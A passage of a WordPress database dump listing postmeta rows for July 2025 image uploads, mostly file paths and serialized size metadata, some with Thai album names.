ocal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5110,1847,'_wp_attached_file','2025/07/S__9871379_0.jpg'),
(5111,1847,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871379_0.jpg\";s:8:\"filesize\";i:431510;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871379_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21582;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871379_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:156501;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871379_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8714;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871379_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99868;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871379_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24079;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5112,1848,'_wp_attached_file','2025/07/S__9871388_0.jpg'),
(5113,1848,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871388_0.jpg\";s:8:\"filesize\";i:427133;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871388_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21507;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871388_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155927;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871388_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8611;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871388_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99844;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871388_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24585;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5114,1849,'_wp_attached_file','2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_5-1.jpg'),
(5115,1849,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:70:\"2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_5-1.jpg\";s:8:\"filesize\";i:370311;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:70:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_5-1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20998;}s:5:\"large\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_5-1-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145681;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:70:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_5-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8071;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:70:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_5-1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93122;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:70:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_5-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21914;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5117,1804,'_thumbnail_id','1844'),
(5118,1804,'_edit_last','1'),
(5119,1804,'title_style','default'),
(5120,1804,'_title_style','field_5d1a0217cf408'),
(5121,1804,'related',''),
(5122,1804,'_related','field_603b51c3e183e'),
(5123,1850,'title_style','default'),
(5124,1850,'_title_style','field_5d1a0217cf408'),
(5125,1850,'related',''),
(5126,1850,'_related','field_603b51c3e183e'),
(5131,1852,'_edit_lock','1752543070:1'),
(5132,1853,'_wp_attached_file','2025/07/S__76939278_0.jpg'),
(5133,1854,'_wp_attached_file','2025/07/S__76939277_0.jpg'),
(5134,1853,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2025/07/S__76939278_0.jpg\";s:8:\"filesize\";i:461862;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__76939278_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17269;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__76939278_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:132995;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76939278_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8342;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__76939278_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83643;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__76939278_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:247652;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76939278_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22009;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5135,1854,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2025/07/S__76939277_0.jpg\";s:8:\"filesize\";i:431699;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__76939277_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15940;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__76939277_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:121705;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76939277_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7726;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__76939277_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75933;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__76939277_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:229507;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76939277_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20238;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5136,1855,'_wp_attached_file','2025/07/S__76939276_0.jpg'),
(5137,1856,'_wp_attached_file','2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_8.jpg'),
(5138,1855,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2025/07/S__76939276_0.jpg\";s:8:\"filesize\";i:300912;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__76939276_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15312;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__76939276_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96916;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76939276_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7583;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__76939276_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63332;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__76939276_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:173907;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76939276_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19158;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5139,1857,'_wp_attached_file','2025/07/S__76939274_0.jpg'),
(5140,1856,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:71:\"2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_8.jpg\";s:8:\"filesize\";i:303340;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_8-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17613;}s:5:\"large\";a:5:{s:4:\"file\";s:72:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_8-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122930;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7083;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_8-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78479;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_8-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17710;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5141,1857,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2025/07/S__76939274_0.jpg\";s:8:\"filesize\";i:387101;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__76939274_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14234;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__76939274_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:109167;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76939274_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8437;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__76939274_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68032;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__76939274_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:205875;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__76939274_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18138;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5142,1858,'_wp_attached_file','2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_9.jpg'),
(5143,1858,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:71:\"2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_9.jpg\";s:8:\"filesize\";i:334788;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_9-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19417;}s:5:\"large\";a:5:{s:4:\"file\";s:72:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_9-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:134603;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7781;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_9-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86111;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_9-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18823;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5144,1859,'_wp_attached_file','2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_6.jpg'),
(5145,1859,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:71:\"2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_6.jpg\";s:8:\"filesize\";i:308623;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_6-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20030;}s:5:\"large\";a:5:{s:4:\"file\";s:72:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_6-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127954;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8011;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_6-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83965;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_6-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19948;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5146,1860,'_wp_attached_file','2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_7.jpg'),
(5147,1860,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:71:\"2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_7.jpg\";s:8:\"filesize\";i:285209;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_7-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19808;}s:5:\"large\";a:5:{s:4:\"file\";s:72:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_7-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:121664;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8191;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_7-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80404;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_7-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20195;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5148,1861,'_wp_attached_file','2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_5.jpg'),
(5149,1861,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:71:\"2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_5.jpg\";s:8:\"filesize\";i:350539;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_5-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19695;}s:5:\"large\";a:5:{s:4:\"file\";s:72:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_5-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:139181;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8050;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:72:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_5-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:139181;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_5-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18415;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5150,1862,'_wp_attached_file','2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_3.jpg'),
(5151,1864,'_wp_attached_file','2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_4.jpg'),
(5152,1863,'_wp_attached_file','2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_2.jpg'),
(5153,1862,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:71:\"2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_3.jpg\";s:8:\"filesize\";i:399459;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_3-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21053;}s:5:\"large\";a:5:{s:4:\"file\";s:72:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_3-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:153035;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8162;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_3-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97210;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:71:\"LINE_ALBUM_วันสำคัญต่างๆ_250715_3-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21493;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
